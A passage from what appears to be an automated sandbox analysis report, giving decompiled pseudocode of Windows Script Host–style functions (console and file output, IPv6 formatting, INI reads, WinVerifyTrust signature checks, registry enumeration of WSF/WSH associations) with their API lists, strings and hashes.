                                                        							_t95 = GetLastError();
                                                        							L46:
                                                        							__eflags = _t95;
                                                        							if(_t95 > 0) {
                                                        								_t95 = _t95 & 0x0000ffff | 0x80070000;
                                                        								__eflags = _t95;
                                                        							}
                                                        							_v524 = _t95;
                                                        							goto L21;
                                                        						}
                                                        						__eflags = _t94 - 0x200;
                                                        						if(_t94 >= 0x200) {
                                                        							_t59 = _t94 + 1; // 0x1
                                                        							_t131 = _t59;
                                                        							__eflags = _t131 - _t94;
                                                        							if(_t131 < _t94) {
                                                        								_v524 = 0x8007000e;
                                                        								goto L21;
                                                        							}
                                                        							_push(_t131);
                                                        							L00B82877();
                                                        							_v540 = _t94;
                                                        							__eflags = _t94;
                                                        							if(_t94 == 0) {
                                                        								_v524 = 0x8007000e;
                                                        								L20:
                                                        								__eflags = _v540;
                                                        								if(_v540 != 0) {
                                                        									_push(_v540);
                                                        									L00B82082();
                                                        								}
                                                        								goto L21;
                                                        							}
                                                        							_v528 = _t94;
                                                        							_t94 = _v544;
                                                        							L16:
                                                        							_t142 = WideCharToMultiByte(1, 0, _t141, _t119, _v528, _t94, 0, 0);
                                                        							__eflags = _t142;
                                                        							if(__eflags == 0) {
                                                        								L38:
                                                        								_t98 = GetLastError();
                                                        								__eflags = _t98;
                                                        								if(_t98 > 0) {
                                                        									_t98 = _t98 & 0x0000ffff | 0x80070000;
                                                        									__eflags = _t98;
                                                        								}
                                                        								_v524 = _t98;
                                                        								goto L20;
                                                        							}
                                                        							if(__eflags <= 0) {
                                                        								goto L20;
                                                        							} else {
                                                        								goto L18;
                                                        							}
                                                        							while(1) {
                                                        								L18:
                                                        								_t101 = WriteFile(_v536, _v528, _t142,  &_v532, 0);
                                                        								__eflags = _t101;
                                                        								if(_t101 == 0) {
                                                        									goto L38;
                                                        								}
                                                        								_t102 = _v532;
                                                        								_v528 = _v528 + _t102;
                                                        								_t142 = _t142 - _t102;
                                                        								__eflags = _t142;
                                                        								if(_t142 != 0) {
                                                        									continue;
                                                        								}
                                                        								goto L20;
                                                        							}
                                                        							goto L38;
                                                        						}
                                                        						_v528 =  &_v520;
                                                        						goto L16;
                                                        					}
                                                        					_t103 = _v544;
                                                        					__eflags =  *((char*)(_t103 + 0x25));
                                                        					if( *((char*)(_t103 + 0x25)) != 0) {
                                                        						L26:
                                                        						__eflags = _t119;
                                                        						if(_t119 <= 0) {
                                                        							goto L21;
                                                        						}
                                                        						_t142 = GetLastError;
                                                        						while(1) {
                                                        							_t104 = 0x3fff;
                                                        							__eflags = _t119 - 0x3fff;
                                                        							if(_t119 <= 0x3fff) {
                                                        								_t104 = _t119;
                                                        							}
                                                        							_t105 = WriteConsoleW(_v536, _t141, _t104,  &_v532, 0);
                                                        							__eflags = _t105;
                                                        							if(_t105 == 0) {
                                                        								goto L40;
                                                        							}
                                                        							_t110 = _v532;
                                                        							_t141 = _t141 + _t110 * 2;
                                                        							_t119 = _t119 - _t110;
                                                        							__eflags = _t119;
                                                        							L32:
                                                        							__eflags = _t119;
                                                        							if(_t119 <= 0) {
                                                        								goto L21;
                                                        							}
                                                        							continue;
                                                        							L40:
                                                        							_t95 = GetLastError();
                                                        							__eflags = _t95 - 6;
                                                        							if(_t95 != 6) {
                                                        								goto L46;
                                                        							}
                                                        							__eflags = _t119;
                                                        							if(_t119 <= 0) {
                                                        								goto L21;
                                                        							} else {
                                                        								goto L42;
                                                        							}
                                                        							while(1) {
                                                        								L42:
                                                        								_t108 = WriteFile(_v536, _t141, _t119 + _t119,  &_v532, 0);
                                                        								__eflags = _t108;
                                                        								if(_t108 == 0) {
                                                        									break;
                                                        								}
                                                        								_v532 = _v532 >> 1;
                                                        								_t109 = _v532;
                                                        								_t119 = _t119 - _t109;
                                                        								__eflags = _t119;
                                                        								_t141 = _t141 + _t109 * 2;
                                                        								if(_t119 == 0) {
                                                        									goto L32;
                                                        								}
                                                        							}
                                                        							_t95 = GetLastError();
                                                        							goto L46;
                                                        						}
                                                        					}
                                                        					_t111 = E00B819AE(_v536);
                                                        					__eflags = _t111;
                                                        					if(_t111 != 0) {
                                                        						goto L26;
                                                        					}
                                                        					goto L13;
                                                        				}
                                                        			}


                                                        APIs
                                                        • lstrlenW.KERNEL32(?), ref: 00B81A52
                                                          • Part of subcall function 00B818C4: GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                          • Part of subcall function 00B818C4: HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B81B8B
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,?,0000000A,00000000,00000000,00000000), ref: 00B81BC2
                                                        • WriteFile.KERNEL32(?,0000000A,00000000,?,00000000), ref: 00B81BE6
                                                          • Part of subcall function 00B81954: memcpy.MSVCRT ref: 00B8198B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharHeapMultiWide$AllocFileProcessWritelstrlenmemcpy
                                                        • String ID:
                                                        • API String ID: 4083229884-0
                                                        • Opcode ID: 7be91fc505eaeda0c570aeb76e9ebd98f73fae027e840905e6e1f1feafd7f50c
                                                        • Instruction ID: f76ab9c73d9fdeb2b53eb574bc06afc3b77a4bdf36adc4d7744516155ed44ab3
                                                        • Opcode Fuzzy Hash: 7be91fc505eaeda0c570aeb76e9ebd98f73fae027e840905e6e1f1feafd7f50c
                                                        • Instruction Fuzzy Hash: E591307198222A9ADB20AB68CC99BEA77FCEB14300F1045E5E419E6171EF74DEC5CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 38%
                                                        			E023113CB(intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr* _v16;
                                                        				intOrPtr _v20;
                                                        				char _v24;
                                                        				intOrPtr _t71;
                                                        				signed int _t78;
                                                        				signed int _t86;
                                                        				char _t90;
                                                        				signed int _t91;
                                                        				signed int _t96;
                                                        				intOrPtr _t108;
                                                        				signed int _t114;
                                                        				void* _t115;
                                                        				intOrPtr _t128;
                                                        				intOrPtr* _t129;
                                                        				void* _t130;
                                                        
                                                        				_t129 = _a4;
                                                        				_t128 = _a8;
                                                        				_t116 = 0;
                                                        				_t71 = _t128 + 0x5c;
                                                        				_v8 = 8;
                                                        				_v20 = _t71;
                                                        				if( *_t129 == 0) {
                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                        						goto L5;
                                                        					} else {
                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                        						if(_t96 != 0) {
                                                        							L38:
                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                        								goto L5;
                                                        							} else {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t86 = E02307707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                        								L36:
                                                        								return _t128 + _t86 * 2;
                                                        							}
                                                        						}
                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                        						if(_t114 == 0) {
                                                        							L33:
                                                        							_t115 = 0x22d2926;
                                                        							L35:
                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                        							_t86 = E02307707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                        							goto L36;
                                                        						}
                                                        						if(_t114 != 0xffff) {
                                                        							_t116 = 0;
                                                        							goto L38;
                                                        						}
                                                        						if(_t114 != 0) {
                                                        							_t115 = 0x22d9cac;
                                                        							goto L35;
                                                        						}
                                                        						goto L33;
                                                        					}
                                                        				} else {
                                                        					L5:
                                                        					_a8 = _t116;
                                                        					_a4 = _t116;
                                                        					_v12 = _t116;
                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                        							_v8 = 6;
                                                        						}
                                                        					}
                                                        					_t90 = _v8;
                                                        					if(_t90 <= _t116) {
                                                        						L11:
                                                        						if(_a8 - _a4 <= 1) {
                                                        							_a8 = _t116;
                                                        							_a4 = _t116;
                                                        						}
                                                        						_t91 = 0;
                                                        						if(_v8 <= _t116) {
                                                        							L22:
                                                        							if(_v8 < 8) {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t128 = _t128 + E02307707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                        							}
                                                        							return _t128;
                                                        						} else {
                                                        							L14:
                                                        							L14:
                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                        									_push(":");
                                                        									_push(_t71 - _t128 >> 1);
                                                        									_push(_t128);
                                                        									_t128 = _t128 + E02307707() * 2;
                                                        									_t71 = _v20;
                                                        									_t130 = _t130 + 0xc;
                                                        								}
                                                        								_t78 = E02307707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                        								_t130 = _t130 + 0x10;
                                                        							} else {
                                                        								_push(L"::");
                                                        								_push(_t71 - _t128 >> 1);
                                                        								_push(_t128);
                                                        								_t78 = E02307707();
                                                        								_t130 = _t130 + 0xc;
                                                        								_t91 = _a8 - 1;
                                                        							}
                                                        							_t91 = _t91 + 1;
                                                        							_t128 = _t128 + _t78 * 2;
                                                        							_t71 = _v20;
                                                        							if(_t91 >= _v8) {
                                                        								goto L22;
                                                        							}
                                                        							_t116 = 0;
                                                        							goto L14;
                                                        						}
                                                        					} else {
                                                        						_t108 = 1;
                                                        						_v16 = _t129;
                                                        						_v24 = _t90;
                                                        						do {
                                                        							if( *_v16 == _t116) {
                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                        									_a4 = _v12;
                                                        									_a8 = _t108;
                                                        								}
                                                        								_t116 = 0;
                                                        							} else {
                                                        								_v12 = _t108;
                                                        							}
                                                        							_v16 = _v16 + 2;
                                                        							_t108 = _t108 + 1;
                                                        							_t26 =  &_v24;
                                                        							 *_t26 = _v24 - 1;
                                                        						} while ( *_t26 != 0);
                                                        						goto L11;
                                                        					}
                                                        				}
                                                        			}





















                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: e3bb70d6ad55c67787f5a6b72c4b0bd9bab3142ddc1cdd48fd90eac1a340fab3
                                                        • Instruction ID: 0f516fe00e73dc58641c5f7f6a3729cb7dfa4af35b607e178d182032a12f59d9
                                                        • Opcode Fuzzy Hash: e3bb70d6ad55c67787f5a6b72c4b0bd9bab3142ddc1cdd48fd90eac1a340fab3
                                                        • Instruction Fuzzy Hash: 2A6113B1E00655AADF38DF99C8909FEBBB6EF84700B14C52DF6DA47644D734A640CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E00B9391E(void* __edx, short* _a4, short* _a8, short* _a12, int* _a16, int _a20) {
                                                        				signed int _v8;
                                                        				char* _v12;
                                                        				char* _v16;
                                                        				char* _v20;
                                                        				int _v24;
                                                        				void* _v36;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t31;
                                                        				int _t33;
                                                        				signed int _t36;
                                                        				int _t39;
                                                        				int _t42;
                                                        				int _t45;
                                                        				void* _t50;
                                                        				int _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				char* _t54;
                                                        				intOrPtr _t56;
                                                        
                                                        				_t50 = __edx;
                                                        				_t31 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t31 ^ _t53;
                                                        				_t56 =  *0xb97001; // 0x0
                                                        				if(_t56 == 0) {
                                                        					_t52 = WideCharToMultiByte;
                                                        					_t51 = _t51 | 0xffffffff;
                                                        					_t33 = WideCharToMultiByte(0, 0, _a4, _t51, 0, 0, 0, 0);
                                                        					_v16 = _t33;
                                                        					if(_t33 != 0) {
                                                        						E00B8320B(_t33);
                                                        						_v20 = _t54;
                                                        						if(_t54 != 0) {
                                                        							if(WideCharToMultiByte(0, 0, _a4, _t51, _v20, _v16, 0, 0) == 0) {
                                                        								goto L3;
                                                        							}
                                                        							_t39 = WideCharToMultiByte(0, 0, _a8, _t51, 0, 0, 0, 0);
                                                        							_v12 = _t39;
                                                        							if(_t39 == 0) {
                                                        								goto L3;
                                                        							}
                                                        							E00B8320B(_t39);
                                                        							_v16 = _t54;
                                                        							if(_t54 == 0) {
                                                        								goto L6;
                                                        							}
                                                        							if(WideCharToMultiByte(0, 0, _a8, _t51, _v16, _v12, 0, 0) == 0) {
                                                        								goto L3;
                                                        							}
                                                        							_t42 = WideCharToMultiByte(0, 0, _a12, _t51, 0, 0, 0, 0);
                                                        							_v24 = _t42;
                                                        							if(_t42 == 0) {
                                                        								goto L3;
                                                        							}
                                                        							E00B8320B(_t42);
                                                        							_v12 = _t54;
                                                        							if(_t54 == 0) {
                                                        								goto L6;
                                                        							}
                                                        							if(WideCharToMultiByte(0, 0, _a12, _t51, _v12, _v24, 0, 0) == 0) {
                                                        								goto L3;
                                                        							}
                                                        							_t45 = GetPrivateProfileIntA(_v16, _v12, _a20, _v20);
                                                        							L15:
                                                        							 *_a16 = _t45;
                                                        							_t36 = 0;
                                                        							L16:
                                                        							return E00B81335(_t36, 0, _v8 ^ _t53, _t50, _t51, _t52);
                                                        						}
                                                        						L6:
                                                        						_t36 = 0x8007000e;
                                                        						goto L16;
                                                        					}
                                                        					L3:
                                                        					_t36 = GetLastError();
                                                        					if(_t36 > 0) {
                                                        						_t36 = _t36 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					goto L16;
                                                        				}
                                                        				_t45 = GetPrivateProfileIntW(_a8, _a12, _a20, _a4);
                                                        				goto L15;
                                                        			}

                                                        APIs
                                                        • GetPrivateProfileIntW.KERNEL32 ref: 00B93949
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,Options,00000000,00000000,00000000,00000000,Options,?,00000000,?,?,00000104,?,?), ref: 00B93967
                                                        • GetLastError.KERNEL32 ref: 00B93970
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiPrivateProfileWide
                                                        • String ID: Options
                                                        • API String ID: 1820523601-529056539
                                                        • Opcode ID: 8f8f257a885565d561ac1764da2acd200f70a5bc88851bf8b476f404a9cbbcd4
                                                        • Instruction ID: b782892be0b644d3ebdd949f1081809d5498b2ded4d4793a51c326cc5ae52ef3
                                                        • Opcode Fuzzy Hash: 8f8f257a885565d561ac1764da2acd200f70a5bc88851bf8b476f404a9cbbcd4
                                                        • Instruction Fuzzy Hash: 33312CB280114DBF9F11AFA18CC4EBF7EFDEB44788B104469F612A6160C6358E60DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E00B910A1(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                        				signed int _v8;
                                                        				char _v9;
                                                        				char _v10;
                                                        				char _v11;
                                                        				char _v12;
                                                        				char _v13;
                                                        				char _v14;
                                                        				char _v15;
                                                        				char _v16;
                                                        				short _v18;
                                                        				short _v20;
                                                        				char _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v36;
                                                        				intOrPtr _v40;
                                                        				intOrPtr _v44;
                                                        				char _v60;
                                                        				char _v64;
                                                        				int _v68;
                                                        				intOrPtr _v72;
                                                        				intOrPtr _v76;
                                                        				intOrPtr _v84;
                                                        				int _v88;
                                                        				int _v92;
                                                        				int _v96;
                                                        				char* _v100;
                                                        				intOrPtr _v104;
                                                        				int _v108;
                                                        				intOrPtr _v112;
                                                        				void _v124;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t55;
                                                        				intOrPtr _t63;
                                                        				signed int _t75;
                                                        				_Unknown_base(*)()* _t79;
                                                        				signed int _t80;
                                                        				signed int _t81;
                                                        				signed int _t84;
                                                        				signed int _t88;
                                                        				intOrPtr _t95;
                                                        				void* _t96;
                                                        				signed int _t97;
                                                        				intOrPtr _t98;
                                                        				int _t99;
                                                        				signed int _t102;
                                                        
                                                        				_t95 = __edx;
                                                        				_t55 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t55 ^ _t102;
                                                        				_v72 = _a8;
                                                        				_v20 = 0xcd44;
                                                        				_t98 = __ecx;
                                                        				_v18 = 0x11d0;
                                                        				_t88 = 0xa;
                                                        				_t96 =  &_v64;
                                                        				memset(_t96, 0, _t88 << 2);
                                                        				_t97 = _t96 + _t88;
                                                        				_v76 = _t98;
                                                        				_v24 = 0xaac56b;
                                                        				_v16 = 0x8c;
                                                        				_v15 = 0xc2;
                                                        				_v14 = 0;
                                                        				_v13 = 0xc0;
                                                        				_v12 = 0x4f;
                                                        				_v11 = 0xc2;
                                                        				_v10 = 0x95;
                                                        				_v9 = 0xee;
                                                        				_v68 = 0;
                                                        				_v64 = 0x28;
                                                        				if(_v72 != 0) {
                                                        					_t97 =  &_v60;
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					_t98 = _v76;
                                                        				}
                                                        				_t63 = _a4 + _a4;
                                                        				_v44 = _t95;
                                                        				_v40 = _t63;
                                                        				_v36 = 0xb89acc;
                                                        				if(_t98 != 0) {
                                                        					_v36 = _t98;
                                                        				}
                                                        				_v32 = _t63;
                                                        				_v28 = 0xb89acc;
                                                        				if(_t98 != 0) {
                                                        					_v28 = _t98;
                                                        				}
                                                        				_t99 = 0x30;
                                                        				memset( &_v124, 0, _t99);
                                                        				_v124 = _t99;
                                                        				_v108 = 0;
                                                        				_v96 = 0;
                                                        				_v92 = 0;
                                                        				_v88 = 0;
                                                        				_v104 = 3;
                                                        				_v112 = (0 | _a12 == 0x00000000) + 1;
                                                        				asm("sbb eax, eax");
                                                        				_v84 = ( ~_a12 & 0xffffff00) + 0x100;
                                                        				_v100 =  &_v64;
                                                        				_t75 = E00B855CA(0xb89acc, "wintrust.dll",  &_v68);
                                                        				_t100 = _t75;
                                                        				if(_t75 < 0) {
                                                        					L23:
                                                        					if(_v68 != 0) {
                                                        						FreeLibrary(_v68);
                                                        					}
                                                        					return E00B81335(_t100, 0, _v8 ^ _t102, _t95, _t97, _t100);
                                                        				} else {
                                                        					_t79 = GetProcAddress(_v68, "WinVerifyTrust");
                                                        					if(_t79 != 0) {
                                                        						_t80 =  *_t79(0,  &_v24,  &_v124);
                                                        						_t97 = 0x80070000;
                                                        						__eflags = _t80;
                                                        						if(__eflags == 0) {
                                                        							L16:
                                                        							__eflags = _a12;
                                                        							if(_a12 != 0) {
                                                        								L22:
                                                        								_t100 = 0;
                                                        								__eflags = 0;
                                                        								goto L23;
                                                        							}
                                                        							_t81 = GetLastError();
                                                        							__eflags = _t81;
                                                        							if(__eflags == 0) {
                                                        								goto L22;
                                                        							}
                                                        							if(__eflags > 0) {
                                                        								__eflags = _t81;
                                                        								if(_t81 > 0) {
                                                        									_t81 = _t81 & 0x0000ffff | _t97;
                                                        									__eflags = _t81;
                                                        								}
                                                        							}
                                                        							_t100 = _t81;
                                                        							__eflags = _t100;
                                                        							if(_t100 < 0) {
                                                        								goto L23;
                                                        							} else {
                                                        								goto L22;
                                                        							}
                                                        						}
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t80;
                                                        							if(_t80 > 0) {
                                                        								_t80 = _t80 & 0x0000ffff | 0x80070000;
                                                        								__eflags = _t80;
                                                        							}
                                                        						}
                                                        						_t100 = _t80;
                                                        						__eflags = _t100;
                                                        						if(_t100 < 0) {
                                                        							goto L23;
                                                        						} else {
                                                        							goto L16;
                                                        						}
                                                        					}
                                                        					_t84 = GetLastError();
                                                        					if(_t84 > 0) {
                                                        						_t84 = _t84 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					_t100 = _t84;
                                                        					goto L23;
                                                        				}
                                                        			}

                                                        APIs
                                                        • memset.MSVCRT ref: 00B91151
                                                        • GetProcAddress.KERNEL32(?,WinVerifyTrust,wintrust.dll,?,?,?,00000000), ref: 00B911B1
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B911BB
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B911FF
                                                        • FreeLibrary.KERNEL32(?,wintrust.dll,?,?,?,00000000), ref: 00B91226
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorLast$AddressFreeLibraryProcmemset
                                                        • String ID: ($O$WinVerifyTrust$wintrust.dll
                                                        • API String ID: 4150920179-3149888995
                                                        • Opcode ID: 0214bae5b8f43757a8520fc533aee1f06946836c98de7127b9388dfb3b7297d0
                                                        • Instruction ID: ba45df0c8d697eaa2123db7121479aceaddfaa018dd210306ae694bf324d6126
                                                        • Opcode Fuzzy Hash: 0214bae5b8f43757a8520fc533aee1f06946836c98de7127b9388dfb3b7297d0
                                                        • Instruction Fuzzy Hash: C6513972D0026A9BCF21DFA8C8845EDBBF5EF05310F144ABAE525FB290D7748A45CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 47%
                                                        			E00B8FA22(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                        				signed int _v8;
                                                        				char _v268;
                                                        				char _v528;
                                                        				int _v532;
                                                        				intOrPtr _v536;
                                                        				char _v540;
                                                        				void* _v544;
                                                        				long _v548;
                                                        				signed int _t33;
                                                        				long _t37;
                                                        				long _t48;
                                                        				void* _t53;
                                                        				void* _t55;
                                                        				void* _t58;
                                                        				void* _t59;
                                                        				void* _t61;
                                                        				signed int _t63;
                                                        
                                                        				_t61 = __esi;
                                                        				_t59 = __edi;
                                                        				_t53 = __ebx;
                                                        				_t33 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t33 ^ _t63;
                                                        				if(_a4 == 0x43) {
                                                        					_v536 = 0xb8fbbc;
                                                        					L5:
                                                        					_push(_t53);
                                                        					_push(_t61);
                                                        					_push(_t59);
                                                        					_push(0);
                                                        					_push(0);
                                                        					_push(0);
                                                        					_push(0);
                                                        					_push( &_v532);
                                                        					_push( &_v268);
                                                        					_v540 = 0;
                                                        					_push(0);
                                                        					while(1) {
                                                        						_v532 = 0x104;
                                                        						_t37 = RegEnumKeyExA(0x80000000, ??, ??, ??, ??, ??, ??, ??);
                                                        						__eflags = _t37 - 0x103;
                                                        						if(_t37 == 0x103) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t37;
                                                        						if(__eflags != 0) {
                                                        							L17:
                                                        							if(__eflags > 0) {
                                                        								__eflags = _t37;
                                                        							}
                                                        							L19:
                                                        							_pop(_t59);
                                                        							_pop(_t61);
                                                        							_pop(_t53);
                                                        							L20:
                                                        							return E00B81335(_t37, _t53, _v8 ^ _t63, _t58, _t59, _t61);
                                                        						}
                                                        						__eflags = _v268 - 0x2e;
                                                        						if(_v268 != 0x2e) {
                                                        							L12:
                                                        							_t24 =  &_v540;
                                                        							 *_t24 = _v540 + 1;
                                                        							__eflags =  *_t24;
                                                        							_push(0);
                                                        							_push(0);
                                                        							_push(0);
                                                        							_push(0);
                                                        							_push( &_v532);
                                                        							_push( &_v268);
                                                        							_push(_v540);
                                                        							continue;
                                                        						}
                                                        						_t37 = RegOpenKeyExA(0x80000000,  &_v268, 0, 0x20019,  &_v544);
                                                        						__eflags = _t37;
                                                        						if(__eflags != 0) {
                                                        							goto L17;
                                                        						}
                                                        						_v532 = 0x104;
                                                        						_v548 = RegQueryValueExA(_v544, 0xb89b44, 0, 0,  &_v528,  &_v532);
                                                        						RegCloseKey(_v544);
                                                        						__eflags = _v548;
                                                        						if(_v548 != 0) {
                                                        							goto L12;
                                                        						}
                                                        						_t48 = _v532;
                                                        						__eflags = _t48;
                                                        						if(_t48 == 0) {
                                                        							goto L12;
                                                        						}
                                                        						 *((char*)(_t63 + _t48 - 0x109)) = 0;
                                                        						_t37 = E00B8F96C(_v536, 0, _t55, _t58,  &_v528, 1);
                                                        						__eflags = _t37;
                                                        						if(_t37 < 0) {
                                                        							goto L19;
                                                        						}
                                                        						goto L12;
                                                        					}
                                                        					_t37 = E00B8F96C(_v536, 0, _t55, _t58, "WSFFile", 0);
                                                        					__eflags = _t37;
                                                        					if(_t37 >= 0) {
                                                        						_t37 = E00B8F96C(_v536, 0, _t55, _t58, "WSHFile", 0);
                                                        						__eflags = _t37;
                                                        						if(_t37 >= 0) {
                                                        							_t37 = 0;
                                                        						}
                                                        					}
                                                        					goto L19;
                                                        				}
                                                        				if(_a4 == 0x57) {
                                                        					_v536 = 0xb8fbb4;
                                                        					goto L5;
                                                        				} else {
                                                        					_t37 = 0x80070057;
                                                        					goto L20;
                                                        				}
                                                        			}


                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000000,0000002E,00000000,00020019,?), ref: 00B8FABA
                                                        • RegQueryValueExA.ADVAPI32 ref: 00B8FAE9
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8FAFB
                                                        • RegEnumKeyExA.ADVAPI32 ref: 00B8FB57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseEnumOpenQueryValue
                                                        • String ID: .$Open2$W$WSFFile$WSHFile
                                                        • API String ID: 3984146545-2040554715
                                                        • Opcode ID: 141b48bd0b824e1f915b9cfae00528ad8bb7a408aa63ebb39b89061bf04b02f9
                                                        • Instruction ID: c2f2879fe7ffab022aa80a29384f49345223acae409758ddb792e6ab64c6b1fc
                                                        • Opcode Fuzzy Hash: 141b48bd0b824e1f915b9cfae00528ad8bb7a408aa63ebb39b89061bf04b02f9
                                                        • Instruction Fuzzy Hash: 2B411AB598111EAEDB20AE94CCD8EFAB6FCEB24354F1005F6E509E2160D6748EC5CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 28%
                                                        			E00B81C53(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				signed int _v8;
                                                        				char _v12;
                                                        				char _v24;
                                                        				intOrPtr _v32;
                                                        				char _v40;
                                                        				char _v56;
                                                        				char* _t39;
                                                        				signed int* _t54;
                                                        				short _t57;
                                                        				char* _t61;
                                                        				char* _t63;
                                                        				intOrPtr _t64;
                                                        				intOrPtr _t65;
                                                        				intOrPtr* _t74;
                                                        				char* _t77;
                                                        
                                                        				_t64 = _a8;
                                                        				if(_t64 == 0) {
                                                        					return 0;
                                                        				}
                                                        				E00B818B2( &_v24);
                                                        				_v56 = 0;
                                                        				_v40 = 0;
                                                        				_t39 = E00B818C4( &_v24, 0x400);
                                                        				_t74 = __imp__#9;
                                                        				_t77 = _t39;
                                                        				if(_t77 < 0) {
                                                        					L11:
                                                        					 *_t74( &_v56);
                                                        					 *_t74( &_v40);
                                                        					E00B815A1( &_v24);
                                                        					return _t77;
                                                        				}
                                                        				_t65 =  *((intOrPtr*)(_t64 + 0x10));
                                                        				_v8 = _v8 & 0x00000000;
                                                        				if(_t65 <= 0) {
                                                        					L9:
                                                        					_t77 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x40)))) + 0x18))(_v24);
                                                        					if(_t77 >= 0) {
                                                        						_t77 = 0;
                                                        					}
                                                        					goto L11;
                                                        				} else {
                                                        					goto L3;
                                                        				}
                                                        				while(1) {
                                                        					L3:
                                                        					 *_t74( &_v56);
                                                        					 *_t74( &_v40);
                                                        					_t54 =  &_v8;
                                                        					__imp__#25(_a8, _t54,  &_v56);
                                                        					_t77 = _t54;
                                                        					if(_t77 < 0) {
                                                        						goto L11;
                                                        					}
                                                        					_push(8);
                                                        					if(1 == _v56) {
                                                        						_pop(_t57);
                                                        						_v40 = _t57;
